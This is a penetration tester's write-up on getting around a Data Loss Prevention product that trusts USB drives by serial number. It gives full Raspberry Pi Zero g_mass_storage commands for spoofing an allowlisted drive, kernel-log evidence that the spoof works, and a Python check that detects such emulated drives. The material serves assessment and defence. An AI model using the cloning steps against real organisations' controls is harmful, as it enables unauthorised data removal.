A while back I was asked to evaluate a Data Loss Prevention (DLP) solution installed on a customer notebook. Besides a lot of poorly implemented controls that at least required an attacker to physically open the notebook and re-attach the hard disk, there was another, easier “solution”.
Encryption was enforced on external drives, but with a few exceptions (for maintenance reasons, so I was told) based solely on the serial number. All you need to emulate one of those privileged USB thumb drives is:
For demonstration purposes I decided to clone all other parameters as well, instead of only the serial number.
Unfortunately this cloning also works for BYOD licenses that allow external drives for authentication.
Original USB flash drive
An old 512MB Alcor Micro Corp. flash drive

    Bus 007 Device 014: ID 058f:6387 Alcor Micro Corp. Flash Drive
    Device Descriptor:
      bLength                18
      bDescriptorType         1
      bcdUSB               2.00
      bDeviceClass            0 (Defined at Interface level)
      bDeviceSubClass         0
      bDeviceProtocol         0
      bMaxPacketSize0        64
      idVendor           0x058f Alcor Micro Corp.
      idProduct          0x6387 Flash Drive
      bcdDevice            1.02
      iManufacturer           1 Generic
      iProduct                2 Mass Storage
      iSerial                 3 363F6D44
      bNumConfigurations      1
Emulated USB flash drive
Using the g_mass_storage module on a Raspberry Pi Zero W

    Bus 005 Device 004: ID 058f:6387 Alcor Micro Corp. Flash Drive
    Device Descriptor:
      bLength                18
      bDescriptorType         1
      bcdUSB               2.00
      bDeviceClass            0 (Defined at Interface level)
      bDeviceSubClass         0
      bDeviceProtocol         0
      bMaxPacketSize0        64
      idVendor           0x058f Alcor Micro Corp.
      idProduct          0x6387 Flash Drive
      bcdDevice            1.02
      iManufacturer           3 Generic
      iProduct                4 Mass Storage
      iSerial                 5 363F6D44
      bNumConfigurations      1
Preparations
1. Download Raspbian Stretch Lite
Download the Raspbian Stretch Lite version from https://www.raspberrypi.org/downloads/raspbian/, verify and unzip:
    dev@m3:~$ curl -LOJ https://downloads.raspberrypi.org/raspbian_lite_latest
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100   390  100   390    0     0   1119      0 --:--:-- --:--:-- --:--:--  1117
    100   399  100   399    0     0    992      0 --:--:-- --:--:-- --:--:--   992
    100  349M  100  349M    0     0  2114k      0  0:02:49  0:02:49 --:--:-- 1382k
    curl: Saved to filename '2018-06-27-raspbian-stretch-lite.zip'
    dev@m3:~$ sha256sum 2018-06-27-raspbian-stretch-lite.zip
    3271b244734286d99aeba8fa043b6634cad488d211583814a2018fc14fdca313  2018-06-27-raspbian-stretch-lite.zip
    dev@m3:~$ unzip 2018-06-27-raspbian-stretch-lite.zip
    Archive:  2018-06-27-raspbian-stretch-lite.zip
      inflating: 2018-06-27-raspbian-stretch-lite.img
2. Write image to SD card
Write the raw image to your SD card (in our case /dev/sdb). This might take a while; send the running dd process a USR1 signal (sudo kill -USR1 <PID of dd>) to print the current progress:
    dev@m3:~$ sudo dd if=./2018-06-27-raspbian-stretch-lite.img of=/dev/sdb
    3637248+0 records in
    3637248+0 records out
    1862270976 bytes (1.9 GB, 1.7 GiB) copied, 819.116 s, 2.3 MB/s
3. Mount boot image, enable host mode, enable SSH and configure WiFi
    dev@m3:~$ mkdir boot root
    dev@m3:~$ sudo mount /dev/sdb1 ./boot
    dev@m3:~$ echo "dtoverlay=dwc2" >> boot/config.txt
    dev@m3:~$ touch boot/ssh
    dev@m3:~$ cat > boot/wpa_supplicant.conf <<'EOF'
    country=AT
    ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
    update_config=1
    network={
        ssid="YOUR-SSID"
        psk="YOUR-SSID-PASSWORD"
        key_mgmt=WPA-PSK
    }
    EOF
    dev@m3:~$ umount boot
4. Boot up your Raspberry with the SD card, create backing storage for the emulated flash drive and set the corresponding parameters
    dev@m3:~$ ssh pi@raspberrypi
    pi@raspberrypi:~ $ dd bs=1M if=/dev/zero of=/home/pi/piusb.bin count=512
    pi@raspberrypi:~ $ sudo modprobe g_mass_storage file=/home/pi/piusb.bin stall=0 ro=0 idVendor=1423 idProduct=25479 iSerialNumber=363F6D44 iManufacturer=Generic iProduct=Mass\ Storage bcdDevice=0x102
5. Connect the USB port of your Raspberry to your host
    Sep 15 16:48:27 m3 kernel: [214679.656289] usb 5-1: new high-speed USB device number 4 using xhci_hcd
    Sep 15 16:48:28 m3 kernel: [214679.799618] usb 5-1: New USB device found, idVendor=058f, idProduct=6387
    Sep 15 16:48:28 m3 kernel: [214679.799623] usb 5-1: New USB device strings: Mfr=3, Product=4, SerialNumber=5
    Sep 15 16:48:28 m3 kernel: [214679.799626] usb 5-1: Product: Mass Storage
    Sep 15 16:48:28 m3 kernel: [214679.799629] usb 5-1: Manufacturer: Generic
    Sep 15 16:48:28 m3 kernel: [214679.799632] usb 5-1: SerialNumber: 363F6D44
    Sep 15 16:48:28 m3 kernel: [214679.800940] usb-storage 5-1:1.0: USB Mass Storage device detected
    Sep 15 16:48:28 m3 kernel: [214679.801269] scsi host8: usb-storage 5-1:1.0
    Sep 15 16:48:28 m3 mtp-probe: checking bus 5, device 4: "/sys/devices/pci0000:00/0000:00:15.1/0000:06:00.0/usb5/5-1"
    Sep 15 16:48:28 m3 mtp-probe: bus: 5, device: 4 was not an MTP device
    Sep 15 16:48:29 m3 kernel: [214680.805482] scsi 8:0:0:0: Direct-Access Linux File-Stor Gadget 0414 PQ: 0 ANSI: 2
    Sep 15 16:48:29 m3 kernel: [214680.806165] sd 8:0:0:0: Attached scsi generic sg1 type 0
    Sep 15 16:48:29 m3 kernel: [214680.806578] sd 8:0:0:0: [sdb] 1048576 512-byte logical blocks: (537 MB/512 MiB)
    Sep 15 16:48:29 m3 kernel: [214680.806744] sd 8:0:0:0: [sdb] Write Protect is off
    Sep 15 16:48:29 m3 kernel: [214680.806907] sd 8:0:0:0: [sdb] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
    Sep 15 16:48:29 m3 kernel: [214680.809743] sd 8:0:0:0: [sdb] Attached SCSI disk
6. Automation
Add the modprobe line to /etc/rc.local to start it automatically each time you connect your Raspberry. Congratulations, you just cloned yourself a flash drive
… or many more, if you just copy the SD card and power up another Raspberry.
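On the detection side, the two descriptor dumps and the step 5 kernel log still differ in two places: the string descriptor indices (1/2/3 on the original, 3/4/5 on the emulation) and the SCSI INQUIRY text "Linux File-Stor Gadget". The following check over kernel log lines is an added example, not part of the original post; the names parse, findings and BASELINE and the sample log are assumptions made for illustration.

```python
import re

# Assumed enrolment record: string indices 1/2/3 from the original's lsusb output.
BASELINE = {("058f", "6387", "363F6D44"): (1, 2, 3)}
GADGET_INQUIRY = "Linux File-Stor Gadget"  # SCSI INQUIRY text from the step 5 log
FOUND = re.compile(r"usb (\S+): New USB device found, idVendor=(\w+), idProduct=(\w+)")
STRINGS = re.compile(r"usb (\S+): New USB device strings: Mfr=(\d+), Product=(\d+), SerialNumber=(\d+)")
SERIAL = re.compile(r"usb (\S+): SerialNumber: (\S+)")
HOST = re.compile(r"scsi host(\d+): usb-storage ([\d.-]+):")
INQUIRY = re.compile(r"scsi (\d+):\d+:\d+:\d+: Direct-Access\s+(.*?)\s+PQ:")

# Constructed sample: 5-1 mirrors the step 5 log; 7-1 is a made-up genuine-drive enumeration.
SAMPLE_LOG = """\
kernel: usb 5-1: New USB device found, idVendor=058f, idProduct=6387
kernel: usb 5-1: New USB device strings: Mfr=3, Product=4, SerialNumber=5
kernel: usb 5-1: SerialNumber: 363F6D44
kernel: scsi host8: usb-storage 5-1:1.0
kernel: scsi 8:0:0:0: Direct-Access     Linux    File-Stor Gadget 0414 PQ: 0 ANSI: 2
kernel: usb 7-1: New USB device found, idVendor=058f, idProduct=6387
kernel: usb 7-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
kernel: usb 7-1: SerialNumber: 363F6D44
""".splitlines()

def parse(lines):  # group kernel enumeration messages by USB port, e.g. "5-1"
    devs, hosts = {}, {}
    for line in lines:
        if m := FOUND.search(line):
            devs[m[1]] = {"vid": m[2], "pid": m[3]}  # new enumeration resets state
        elif m := STRINGS.search(line):
            devs.setdefault(m[1], {})["idx"] = tuple(int(g) for g in m.groups()[1:])
        elif m := SERIAL.search(line):
            devs.setdefault(m[1], {})["serial"] = m[2]
        elif m := HOST.search(line):
            hosts[m[1]] = m[2]  # SCSI host number -> USB port
        elif (m := INQUIRY.search(line)) and m[1] in hosts:
            devs.setdefault(hosts[m[1]], {})["inquiry"] = " ".join(m[2].split())
    return devs

def findings(dev):  # reasons why a device presenting an allowlisted serial looks emulated
    out = []
    key = (dev.get("vid"), dev.get("pid"), dev.get("serial"))
    if key in BASELINE and dev.get("idx") != BASELINE[key]:
        out.append("string-index-mismatch")
    if dev.get("inquiry", "").startswith(GADGET_INQUIRY):
        out.append("linux-gadget-inquiry")
    return out

for port, dev in parse(SAMPLE_LOG).items():
    print(port, dev.get("serial"), findings(dev) or "matches enrolled fingerprint")
```

Both checks are heuristics derived only from the output shown on this page. Every descriptor field, the serial number included, is reported by the device itself, so an allowlist keyed on it identifies a claim, not a drive.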